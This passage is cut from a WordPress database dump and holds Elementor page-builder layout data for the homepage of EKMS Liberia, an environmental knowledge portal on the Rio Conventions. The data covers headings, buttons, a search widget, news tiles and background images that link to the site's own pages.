Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19470,2852,'_elementor_version','2.7.5'),(19471,2852,'_elementor_template_type','wp-page'),(19472,2852,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19475,2853,'_wp_page_template','default'),(19476,2853,'_elementor_edit_mode','builder'),(19477,2853,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center 